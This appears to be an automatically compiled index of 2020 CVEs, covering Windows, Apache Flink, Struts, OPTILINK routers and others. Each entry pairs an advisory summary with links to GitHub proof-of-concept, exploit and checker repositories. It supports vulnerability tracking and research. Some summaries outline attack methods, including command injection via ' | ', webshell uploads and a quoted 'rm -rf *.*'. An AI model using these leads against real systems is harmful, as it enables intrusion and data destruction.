- [Nate0634034090/nate158g-m-w-n-l-p-d-a-o-e](https://github.com/Nate0634034090/nate158g-m-w-n-l-p-d-a-o-e)
### CVE-2020-16270 (2020-10-16)
OLIMPOKS under 3.3.39 allows Auth/Admin ErrorMessage XSS. Remote Attacker can use discovered vulnerability to inject malicious JavaScript payload to victim’s browsers in context of vulnerable applications. Executed code can be used to steal administrator’s cookies, influence HTML content of targeted application and perform phishing-related attacks. Vulnerable application used in more than 3000 organizations in different sectors from retail to industries.
- [Security-AVS/CVE-2020-16270](https://github.com/Security-AVS/CVE-2020-16270)
### CVE-2020-16846 (2020-11-06)
An issue was discovered in SaltStack Salt through 3002. Sending crafted web requests to the Salt API, with the SSH client enabled, can result in shell injection.
- [zomy22/CVE-2020-16846-Saltstack-Salt-API](https://github.com/zomy22/CVE-2020-16846-Saltstack-Salt-API)
- [hamza-boudouche/projet-secu](https://github.com/hamza-boudouche/projet-secu)
### CVE-2020-16898 (2020-10-16)
<p>A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.</p>\n<p>To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.</p>\n<p>The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.</p>\n
- [advanced-threat-research/CVE-2020-16898](https://github.com/advanced-threat-research/CVE-2020-16898)
- [corelight/CVE-2020-16898](https://github.com/corelight/CVE-2020-16898)
- [Maliek/CVE-2020-16898_Check](https://github.com/Maliek/CVE-2020-16898_Check)
- [ZephrFish/CVE-2020-16898](https://github.com/ZephrFish/CVE-2020-16898)
- [esnet-security/cve-2020-16898](https://github.com/esnet-security/cve-2020-16898)
- [initconf/CVE-2020-16898-Bad-Neighbor](https://github.com/initconf/CVE-2020-16898-Bad-Neighbor)
- [Q1984/CVE-2020-16898](https://github.com/Q1984/CVE-2020-16898)
- [0xeb-bp/cve-2020-16898](https://github.com/0xeb-bp/cve-2020-16898)
- [jiansiting/cve-2020-16898](https://github.com/jiansiting/cve-2020-16898)
- [CPO-EH/CVE-2020-16898_Workaround](https://github.com/CPO-EH/CVE-2020-16898_Workaround)
- [CPO-EH/CVE-2020-16898_Checker](https://github.com/CPO-EH/CVE-2020-16898_Checker)
- [momika233/CVE-2020-16898-exp](https://github.com/momika233/CVE-2020-16898-exp)
- [komomon/CVE-2020-16898-EXP-POC](https://github.com/komomon/CVE-2020-16898-EXP-POC)
- [komomon/CVE-2020-16898--EXP-POC](https://github.com/komomon/CVE-2020-16898--EXP-POC)
### CVE-2020-16899 (2020-10-16)
<p>A denial of service vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could cause a target system to stop responding.</p>\n<p>To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer. The vulnerability would not allow an attacker to execute code or to elevate user rights directly.</p>\n<p>The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.</p>\n
- [advanced-threat-research/CVE-2020-16899](https://github.com/advanced-threat-research/CVE-2020-16899)
### CVE-2020-16938 (2020-10-16)
<p>An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user’s system.</p>\n<p>To exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.</p>\n<p>The update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.</p>\n
- [ioncodes/CVE-2020-16938](https://github.com/ioncodes/CVE-2020-16938)
### CVE-2020-16939 (2020-10-16)
<p>An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context.</p>\n<p>To exploit the vulnerability, an attacker would first have to log on to the system, and then run a specially crafted application to take control over the affected system.</p>\n<p>The security update addresses the vulnerability by correcting how Group Policy checks access.</p>\n
- [rogue-kdc/CVE-2020-16939](https://github.com/rogue-kdc/CVE-2020-16939)
### CVE-2020-16947 (2020-10-16)
<p>A remote code execution vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the targeted user. If the targeted user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.</p>\n<p>Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Outlook software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file designed to exploit the vulnerability. An attacker would have no way to force users to visit the website. Instead, an attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.</p>\n<p>Note that where severity is indicated as Critical in the Affected Products table, the Preview Pane is an attack vector.</p>\n<p>The security update addresses the vulnerability by correcting how Outlook handles objects in memory.</p>\n
- [0neb1n/CVE-2020-16947](https://github.com/0neb1n/CVE-2020-16947)
- [MasterSploit/CVE-2020-16947](https://github.com/MasterSploit/CVE-2020-16947)
### CVE-2020-17008
- [jas502n/CVE-2020-17008](https://github.com/jas502n/CVE-2020-17008)
### CVE-2020-17035 (2020-11-11)
Windows Kernel Elevation of Privilege Vulnerability
- [flamelu/CVE-2020-17035-patch-analysis](https://github.com/flamelu/CVE-2020-17035-patch-analysis)
### CVE-2020-17057 (2020-11-11)
Windows Win32k Elevation of Privilege Vulnerability
- [fengjixuchui/cve-2020-17057](https://github.com/fengjixuchui/cve-2020-17057)
- [lsw29475/CVE-2020-17057](https://github.com/lsw29475/CVE-2020-17057)
### CVE-2020-17086 (2020-11-11)
Raw Image Extension Remote Code Execution Vulnerability
- [T81oub/CVE-2020-17086](https://github.com/T81oub/CVE-2020-17086)
### CVE-2020-17087 (2020-11-11)
Windows Kernel Local Elevation of Privilege Vulnerability
- [revengsh/CVE-2020-17087](https://github.com/revengsh/CVE-2020-17087)
- [ykg88/OHTS_IE6052-CVE-2020-17087](https://github.com/ykg88/OHTS_IE6052-CVE-2020-17087)
- [vp777/Windows-Non-Paged-Pool-Overflow-Exploitation](https://github.com/vp777/Windows-Non-Paged-Pool-Overflow-Exploitation)
- [raiden757/CVE-2020-17087](https://github.com/raiden757/CVE-2020-17087)
### CVE-2020-17136 (2020-12-09)
Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
- [xyddnljydd/CVE-2020-17136](https://github.com/xyddnljydd/CVE-2020-17136)
- [cssxn/CVE-2020-17136](https://github.com/cssxn/CVE-2020-17136)
### CVE-2020-17144 (2020-12-09)
Microsoft Exchange Remote Code Execution Vulnerability
- [Airboi/CVE-2020-17144-EXP](https://github.com/Airboi/CVE-2020-17144-EXP)
- [zcgonvh/CVE-2020-17144](https://github.com/zcgonvh/CVE-2020-17144)
### CVE-2020-17382 (2020-10-02)
The MSI AmbientLink MsIo64 driver 1.0.0.8 has a Buffer Overflow (0x80102040, 0x80102044, 0x80102050,and 0x80102054).
- [uf0o/CVE-2020-17382](https://github.com/uf0o/CVE-2020-17382)
- [houseofxyz/CVE-2020-17382](https://github.com/houseofxyz/CVE-2020-17382)
### CVE-2020-17453 (2021-04-05)
WSO2 Management Console through 5.10 allows XSS via the carbon/admin/login.jsp msgId parameter.
- [ydycjz6j/CVE-2020-17453-PoC](https://github.com/ydycjz6j/CVE-2020-17453-PoC)
- [karthi-the-hacker/CVE-2020-17453](https://github.com/karthi-the-hacker/CVE-2020-17453)
### CVE-2020-17456 (2020-08-19)
SEOWON INTECH SLC-130 And SLR-120S devices allow Remote Code Execution via the ipAddr parameter to the system_log.cgi page.
- [Al1ex/CVE-2020-17456](https://github.com/Al1ex/CVE-2020-17456)
- [TAPESH-TEAM/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated](https://github.com/TAPESH-TEAM/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated)
### CVE-2020-17496 (2020-08-12)
vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
- [ctlyz123/CVE-2020-17496](https://github.com/ctlyz123/CVE-2020-17496)
- [ludy-dev/vBulletin_5.x-tab_panel-RCE](https://github.com/ludy-dev/vBulletin_5.x-tab_panel-RCE)
### CVE-2020-17518 (2021-01-05)
Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, through a maliciously modified HTTP HEADER. The files can be written to any location accessible by Flink 1.5.1. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4 from apache/flink:master.
- [QmF0c3UK/CVE-2020-17518](https://github.com/QmF0c3UK/CVE-2020-17518)
- [murataydemir/CVE-2020-17518](https://github.com/murataydemir/CVE-2020-17518)
- [rakjong/Flink-CVE-2020-17518-getshell](https://github.com/rakjong/Flink-CVE-2020-17518-getshell)
### CVE-2020-17519 (2021-01-05)
A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.
- [B1anda0/CVE-2020-17519](https://github.com/B1anda0/CVE-2020-17519)
- [QmF0c3UK/CVE-2020-17519](https://github.com/QmF0c3UK/CVE-2020-17519)
- [dolevf/apache-flink-directory-traversal.nse](https://github.com/dolevf/apache-flink-directory-traversal.nse)
- [hoanx4/CVE-2020-17519](https://github.com/hoanx4/CVE-2020-17519)
- [murataydemir/CVE-2020-17519](https://github.com/murataydemir/CVE-2020-17519)
- [radbsie/CVE-2020-17519-Exp](https://github.com/radbsie/CVE-2020-17519-Exp)
- [yaunsky/CVE-2020-17519-Apache-Flink](https://github.com/yaunsky/CVE-2020-17519-Apache-Flink)
- [Osyanina/westone-CVE-2020-17519-scanner](https://github.com/Osyanina/westone-CVE-2020-17519-scanner)
- [givemefivw/CVE-2020-17519](https://github.com/givemefivw/CVE-2020-17519)
- [MrCl0wnLab/SimplesApachePathTraversal](https://github.com/MrCl0wnLab/SimplesApachePathTraversal)
- [zhangweijie11/CVE-2020-17519](https://github.com/zhangweijie11/CVE-2020-17519)
### CVE-2020-17523 (2021-02-03)
Apache Shiro before 1.7.1, when using Apache Shiro with Spring, a specially crafted HTTP request may cause an authentication bypass.
- [jweny/shiro-cve-2020-17523](https://github.com/jweny/shiro-cve-2020-17523)
### CVE-2020-17527 (2020-12-03)
While investigating bug 64830 it was discovered that Apache Tomcat 10.0.0-M1 to 10.0.0-M9, 9.0.0-M1 to 9.0.39 and 8.5.0 to 8.5.59 could re-use an HTTP request header value from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests.
- [forse01/CVE-2020-17527-Tomcat](https://github.com/forse01/CVE-2020-17527-Tomcat)
### CVE-2020-17530 (2020-12-11)
Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
- [secpool2000/CVE-2020-17530](https://github.com/secpool2000/CVE-2020-17530)
- [ka1n4t/CVE-2020-17530](https://github.com/ka1n4t/CVE-2020-17530)
- [wuzuowei/CVE-2020-17530](https://github.com/wuzuowei/CVE-2020-17530)
- [Al1ex/CVE-2020-17530](https://github.com/Al1ex/CVE-2020-17530)
- [fengziHK/CVE-2020-17530-strust2-061](https://github.com/fengziHK/CVE-2020-17530-strust2-061)
- [ludy-dev/freemarker_RCE_struts2_s2-061](https://github.com/ludy-dev/freemarker_RCE_struts2_s2-061)
- [CyborgSecurity/CVE-2020-17530](https://github.com/CyborgSecurity/CVE-2020-17530)
- [uzzzval/CVE-2020-17530](https://github.com/uzzzval/CVE-2020-17530)
- [killmonday/CVE-2020-17530-s2-061](https://github.com/killmonday/CVE-2020-17530-s2-061)
- [keyuan15/CVE-2020-17530](https://github.com/keyuan15/CVE-2020-17530)
- [nth347/CVE-2020-17530](https://github.com/nth347/CVE-2020-17530)
### CVE-2020-17531 (2020-12-08)
A Java Serialization vulnerability was found in Apache Tapestry 4. Apache Tapestry 4 will attempt to deserialize the "sp" parameter even before invoking the page's validate method, leading to deserialization without authentication. Apache Tapestry 4 reached end of life in 2008 and no update to address this issue will be released. Apache Tapestry 5 versions are not vulnerable to this issue. Users of Apache Tapestry 4 should upgrade to the latest Apache Tapestry 5 version.
- [154802388/CVE-2020-17531](https://github.com/154802388/CVE-2020-17531)
### CVE-2020-17533 (2020-12-29)
Apache Accumulo versions 1.5.0 through 1.10.0 and version 2.0.0 do not properly check the return value of some policy enforcement functions before permitting an authenticated user to perform certain administrative operations. Specifically, the return values of the 'canFlush' and 'canPerformSystemActions' security functions are not checked in some instances, therefore allowing an authenticated user with insufficient permissions to perform the following actions: flushing a table, shutting down Accumulo or an individual tablet server, and setting or removing system-wide Accumulo configuration properties.
- [pazeray/CVE-2020-17533](https://github.com/pazeray/CVE-2020-17533)
### CVE-2020-18324 (2022-03-04)
Cross Site Scripting (XSS) vulnerability exists in Subrion CMS 4.2.1 via the q parameter in the Kickstart template.
- [hamm0nz/CVE-2020-18324](https://github.com/hamm0nz/CVE-2020-18324)
### CVE-2020-18325 (2022-03-04)
Multilple Cross Site Scripting (XSS) vulnerability exists in Intelliants Subrion CMS v4.2.1 in the Configuration panel.
- [hamm0nz/CVE-2020-18325](https://github.com/hamm0nz/CVE-2020-18325)
### CVE-2020-18326 (2022-03-04)
Cross Site Request Forgery (CSRF) vulnerability exists in Intelliants Subrion CMS v4.2.1 via the Members administrator function, which could let a remote unauthenticated malicious user send an authorised request to victim and successfully create an arbitrary administrator user.
- [hamm0nz/CVE-2020-18326](https://github.com/hamm0nz/CVE-2020-18326)
### CVE-2020-19360 (2021-01-20)
Local file inclusion in FHEM 6.0 allows in fhem/FileLog_logWrapper file parameter can allow an attacker to include a file, which can lead to sensitive information disclosure.
- [a1665454764/CVE-2020-19360](https://github.com/a1665454764/CVE-2020-19360)
- [zzzz966/CVE-2020-19360](https://github.com/zzzz966/CVE-2020-19360)
### CVE-2020-19586 (2022-09-14)
Incorrect Access Control issue in Yellowfin Business Intelligence 7.3 allows remote attackers to escalate privilege via MIAdminStyles.i4 Admin UI.
- [Deepak983/CVE-2020-19586](https://github.com/Deepak983/CVE-2020-19586)
### CVE-2020-19587 (2022-09-14)
Cross Site Scripting (XSS) vulnerability in configMap parameters in Yellowfin Business Intelligence 7.3 allows remote attackers to run arbitrary code via MIAdminStyles.i4 Admin UI.
- [Deepak983/CVE-2020-19587](https://github.com/Deepak983/CVE-2020-19587)
### CVE-2020-20093 (2022-03-23)
The Facebook Messenger app for iOS 227.0 and prior and Android 228.1.0.10.116 and prior user interface does not properly represent URI messages to the user, which results in URI spoofing via specially crafted messages.
- [zadewg/RIUS](https://github.com/zadewg/RIUS)
### CVE-2020-21378 (2020-12-21)
SQL injection vulnerability in SeaCMS 10.1 (2020.02.08) via the id parameter in an edit action to admin_members_group.php.
- [sukusec301/SeaCMS-v10.1](https://github.com/sukusec301/SeaCMS-v10.1)
### CVE-2020-23160 (2021-01-22)
Remote code execution in Pyrescom Termod4 time management devices before 10.04k allows authenticated remote attackers to arbitrary commands as root on the devices.
- [Outpost24/Pyrescom-Termod-PoC](https://github.com/Outpost24/Pyrescom-Termod-PoC)
### CVE-2020-23342 (2021-01-19)
A CSRF vulnerability exists in Anchor CMS 0.12.7 anchor/views/users/edit.php that can change the Delete admin users.
- [DXY0411/CVE-2020-23342](https://github.com/DXY0411/CVE-2020-23342)
### CVE-2020-23489 (2020-11-16)
The import.json.php file before 8.9 for Avideo is vulnerable to a File Deletion vulnerability. This allows the deletion of configuration.php, which leads to certain privilege checks not being in place, and therefore a user can escalate privileges to admin.
- [ahussam/AVideo3xploit](https://github.com/ahussam/AVideo3xploit)
### CVE-2020-23582 (2022-11-21)
A vulnerability in the "/admin/wlmultipleap.asp" of optilink OP-XT71000N version: V2.2 could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to create Multiple WLAN BSSID.
- [huzaifahussain98/CVE-2020-23582](https://github.com/huzaifahussain98/CVE-2020-23582)
### CVE-2020-23583 (2022-11-23)
OPTILINK OP-XT71000N V2.2 is vulnerable to Remote Code Execution. The issue occurs when the attacker sends an arbitrary code on "/diag_ping_admin.asp" to "PingTest" interface that leads to COMMAND EXECUTION. An attacker can successfully trigger the COMMAND and can compromise full system.
- [huzaifahussain98/CVE-2020-23583](https://github.com/huzaifahussain98/CVE-2020-23583)
### CVE-2020-23584 (2022-11-23)
Unauthenticated remote code execution in OPTILINK OP-XT71000N, Hardware Version: V2.2 occurs when the attacker passes arbitrary commands with IP-ADDRESS using " | " to execute commands on " /diag_tracert_admin.asp " in the "PingTest" parameter that leads to command execution.
- [huzaifahussain98/CVE-2020-23584](https://github.com/huzaifahussain98/CVE-2020-23584)
### CVE-2020-23585 (2022-11-23)
A remote attacker can conduct a cross-site request forgery (CSRF) attack on OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028. The vulnerability is due to insufficient CSRF protections for the "mgm_config_file.asp" because of which attacker can create a crafted "csrf form" which sends " malicious xml data" to "/boaform/admin/formMgmConfigUpload". the exploit allows attacker to "gain full privileges" and to "fully compromise of router & network".
- [huzaifahussain98/CVE-2020-23585](https://github.com/huzaifahussain98/CVE-2020-23585)
### CVE-2020-23586 (2022-11-23)
A vulnerability found in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to Add Network Traffic Control Type Rule.
- [huzaifahussain98/CVE-2020-23586](https://github.com/huzaifahussain98/CVE-2020-23586)
### CVE-2020-23587 (2022-11-23)
A vulnerability found in the OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to men in the middle attack by adding New Routes in RoutingConfiguration on " /routing.asp ".
- [huzaifahussain98/CVE-2020-23587](https://github.com/huzaifahussain98/CVE-2020-23587)
### CVE-2020-23588 (2022-11-23)
A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to "Enable or Disable Ports" and to "Change port number" through " /rmtacc.asp ".
- [huzaifahussain98/CVE-2020-23588](https://github.com/huzaifahussain98/CVE-2020-23588)
### CVE-2020-23589 (2022-11-23)
A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to cause a Denial of Service by Rebooting the router through " /mgm_dev_reboot.asp."
- [huzaifahussain98/CVE-2020-23589](https://github.com/huzaifahussain98/CVE-2020-23589)
### CVE-2020-23590 (2022-11-23)
A vulnerability in Optilink OP-XT71000N Hardware version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated remote attacker to conduct a cross-site request forgery (CSRF) attack to change the Password for "WLAN SSID" through "wlwpa.asp".
- [huzaifahussain98/CVE-2020-23590](https://github.com/huzaifahussain98/CVE-2020-23590)
### CVE-2020-23591 (2022-11-23)
A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an attacker to upload arbitrary files through " /mgm_dev_upgrade.asp " which can "delete every file for Denial of Service (using 'rm -rf *.*' in the code), reverse connection (using '.asp' webshell), backdoor.
- [huzaifahussain98/CVE-2020-23591](https://github.com/huzaifahussain98/CVE-2020-23591)
### CVE-2020-23592 (2022-11-23)
A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to Reset ONU to Factory Default through ' /mgm_dev_reset.asp.' Resetting to default leads to Escalation of Privileges by logging-in with default credentials.
- [huzaifahussain98/CVE-2020-23592](https://github.com/huzaifahussain98/CVE-2020-23592)
### CVE-2020-23593 (2022-11-23)
A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2, Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross site request forgery (CSRF) attack to enable syslog mode through ' /mgm_log_cfg.asp.' The system starts to log events, 'Remote' mode or 'Both' mode on "Syslog -- Configuration page" logs events and sends to remote syslog server IP and Port.
- [huzaifahussain98/CVE-2020-23593](https://github.com/huzaifahussain98/CVE-2020-23593)
### CVE-2020-23839 (2020-09-01)
A Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16, in the admin/index.php login portal webpage, allows remote attackers to execute JavaScript code in the client's browser and harvest login credentials after a client clicks a link, enters credentials, and submits the login form.
- [boku7/CVE-2020-23839](https://github.com/boku7/CVE-2020-23839)
### CVE-2020-23934 (2020-08-18)
An issue was discovered in RiteCMS 2.2.1. An authenticated user can directly execute system commands by uploading a php web shell in the "Filemanager" section.
- [H0j3n/CVE-2020-23934](https://github.com/H0j3n/CVE-2020-23934)
### CVE-2020-23968 (2020-11-10)
Ilex International Sign&go Workstation Security Suite 7.1 allows elevation of privileges via a symlink attack on ProgramData\Ilex\S&G\Logs\000-sngWSService1.log.
- [ricardojba/CVE-2020-23968-ILEX-SignGo-EoP](https://github.com/ricardojba/CVE-2020-23968-ILEX-SignGo-EoP)
### CVE-2020-24028 (2020-09-02)
ForLogic Qualiex v1 and v3 allows any authenticated customer to achieve privilege escalation via user creations, password changes, or user permission updates.
- [underprotection/CVE-2020-24028](https://github.com/underprotection/CVE-2020-24028)
- [redteambrasil/CVE-2020-24028](https://github.com/redteambrasil/CVE-2020-24028)
### CVE-2020-24029 (2020-09-02)
Because of unauthenticated password changes in ForLogic Qualiex v1 and v3, customer and admin permissions and data can be accessed via a simple request.
- [underprotection/CVE-2020-24029](https://github.com/underprotection/CVE-2020-24029)
- [redteambrasil/CVE-2020-24029](https://github.com/redteambrasil/CVE-2020-24029)
### CVE-2020-24030 (2020-09-02)
ForLogic Qualiex v1 and v3 has weak token expiration. This allows remote unauthenticated privilege escalation and access to sensitive data via token reuse.
- [underprotection/CVE-2020-24030](https://github.com/underprotection/CVE-2020-24030)
- [redteambrasil/CVE-2020-24030](https://github.com/redteambrasil/CVE-2020-24030)
### CVE-2020-24032 (2020-08-18)
tz.pl on XoruX LPAR2RRD and STOR2RRD 2.70 virtual appliances allows cmd=set&tz=OS command injection via shell metacharacters in a timezone.
- [jet-pentest/CVE-2020-24032](https://github.com/jet-pentest/CVE-2020-24032)
### CVE-2020-24033 (2020-10-22)
An issue was discovered in fs.com S3900 24T4S 1.7.0 and earlier. The form does not have an authentication or token authentication mechanism that allows remote attackers to forge requests on behalf of a site administrator to change all settings including deleting users, creating new users with escalated privileges.
- [M0NsTeRRR/CVE-2020-24033](https://github.com/M0NsTeRRR/CVE-2020-24033)
### CVE-2020-24088 (2023-09-11)
An issue was discovered in MmMapIoSpace routine in Foxconn Live Update Utility 2.1.6.26, allows local attackers to escalate privileges.
- [rjt-gupta/CVE-2020-24088](https://github.com/rjt-gupta/CVE-2020-24088)
### CVE-2020-24089 (2023-09-19)
An issue was discovered in ImfHpRegFilter.sys in IOBit Malware Fighter version 8.0.2, allows local attackers to cause a denial of service (DoS).
- [rjt-gupta/CVE-2020-24089](https://github.com/rjt-gupta/CVE-2020-24089)
### CVE-2020-24148 (2021-07-07)
Server-side request forgery (SSRF) in the Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 for WordPress via the data parameter in a moove_read_xml action.
- [dwisiswant0/CVE-2020-24148](https://github.com/dwisiswant0/CVE-2020-24148)
### CVE-2020-24186 (2020-08-24)
A Remote Code Execution vulnerability exists in the gVectors wpDiscuz plugin 7.0 through 7.0.4 for WordPress, which allows unauthenticated users to upload any type of file, including PHP files via the wmuUploadFiles AJAX action.
- [hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE](https://github.com/hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE)
- [meicookies/CVE-2020-24186](https://github.com/meicookies/CVE-2020-24186)
- [Sakura-501/CVE-2020-24186-exploit](https://github.com/Sakura-501/CVE-2020-24186-exploit)
- [substing/CVE-2020-24186_reverse_shell_upload](https://github.com/substing/CVE-2020-24186_reverse_shell_upload)
### CVE-2020-24227 (2020-11-23)
Playground Sessions v2.5.582 (and earlier) for Windows, stores the user credentials in plain text allowing anyone with access to UserProfiles.sol to extract the email and password.
- [nathunandwani/CVE-2020-24227](https://github.com/nathunandwani/CVE-2020-24227)
### CVE-2020-24490 (2021-02-02)
Improper buffer restrictions in BlueZ may allow an unauthenticated user to potentially enable denial of service via adjacent access. This affects all Linux kernel versions that support BlueZ.
- [AbrarKhan/linux_CVE-2020-24490-beforePatch](https://github.com/AbrarKhan/linux_CVE-2020-24490-beforePatch)
- [AbrarKhan/Linux-4.19.72_CVE-2020-24490](https://github.com/AbrarKhan/Linux-4.19.72_CVE-2020-24490)
### CVE-2020-24572 (2020-08-24)
An issue was discovered in includes/webconsole.php in RaspAP 2.5. With authenticated access, an attacker can use a misconfigured (and virtually unrestricted) web console to attack the underlying OS (Raspberry Pi) running this software, and execute commands on the system (including ones for uploading of files and execution of code).
- [lb0x/cve-2020-24572](https://github.com/lb0x/cve-2020-24572)
- [gerbsec/CVE-2020-24572-POC](https://github.com/gerbsec/CVE-2020-24572-POC)
### CVE-2020-24597
- [HoangKien1020/CVE-2020-24597](https://github.com/HoangKien1020/CVE-2020-24597)
### CVE-2020-24616 (2020-08-25)
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP).
- [0xkami/cve-2020-24616-poc](https://github.com/0xkami/cve-2020-24616-poc)
### CVE-2020-24656 (2020-08-26)
Maltego before 4.2.12 allows XXE attacks.
- [terzinodipaese/Internet-Security-Project](https://github.com/terzinodipaese/Internet-Security-Project)
### CVE-2020-24750 (2020-09-17)
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration.
- [Al1ex/CVE-2020-24750](https://github.com/Al1ex/CVE-2020-24750)
### CVE-2020-24765 (2020-10-20)
InterMind iMind Server through 3.13.65 allows remote unauthenticated attackers to read the self-diagnostic archive via a direct api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1 request.
- [fbkcs/CVE-2020-24765](https://github.com/fbkcs/CVE-2020-24765)
### CVE-2020-24815 (2020-11-24)
A Server-Side Request Forgery (SSRF) affecting the PDF generation in MicroStrategy 10.4, 2019 before Update 6, and 2020 before Update 2 allows authenticated users to access the content of internal network resources or leak files from the local system via HTML containers embedded in a dossier/dashboard document. NOTE: 10.4., no fix will be released as version will reach end-of-life on 31/12/2020.
- [darkvirus-7x/exploit-CVE-2020-24815](https://github.com/darkvirus-7x/exploit-CVE-2020-24815)
### CVE-2020-24913 (2021-03-04)
A SQL injection vulnerability in qcubed (all versions including 3.1.1) in profile.php via the strQuery parameter allows an unauthenticated attacker to access the database by injecting SQL code via a crafted POST request.
- [agarma/CVE-2020-24913-PoC](https://github.com/agarma/CVE-2020-24913-PoC)
### CVE-2020-24949 (2020-09-03)
Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
- [r90tpass/CVE-2020-24949](https://github.com/r90tpass/CVE-2020-24949)
### CVE-2020-24955 (2020-09-01)
SUPERAntiSyware Professional X Trial 10.0.1206 is vulnerable to local privilege escalation because it allows unprivileged users to restore a malicious DLL from quarantine into the system32 folder via an NTFS directory junction, as demonstrated by a crafted ualapi.dll file that is detected as malware.
- [b1nary0x1/CVE-2020-24955](https://github.com/b1nary0x1/CVE-2020-24955)
### CVE-2020-24972 (2020-08-29)
The Kleopatra component before 3.1.12 (and before 20.07.80) for GnuPG allows remote attackers to execute arbitrary code because openpgp4fpr: URLs are supported without safe handling of command-line options. The Qt platformpluginpath command-line option can be used to load an arbitrary DLL.
- [SpiralBL0CK/CVE-2020-24972](https://github.com/SpiralBL0CK/CVE-2020-24972)
### CVE-2020-25068 (2020-09-03)
Setelsa Conacwin v3.7.1.2 is vulnerable to a local file inclusion vulnerability. This vulnerability allows a remote unauthenticated attacker to read internal files on the server via an http:IP:PORT/../../path/file_to_disclose Directory Traversal URI. NOTE: The manufacturer indicated that the affected version does not exist. Furthermore, they indicated that they detected this problem in an internal audit more than 3 years ago and fixed it in 2017.
- [bryanroma/CVE-2020-25068](https://github.com/bryanroma/CVE-2020-25068)
### CVE-2020-25078 (2020-09-02)
An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure.
- [MzzdToT/CVE-2020-25078](https://github.com/MzzdToT/CVE-2020-25078)
- [chinaYozz/CVE-2020-25078](https://github.com/chinaYozz/CVE-2020-25078)
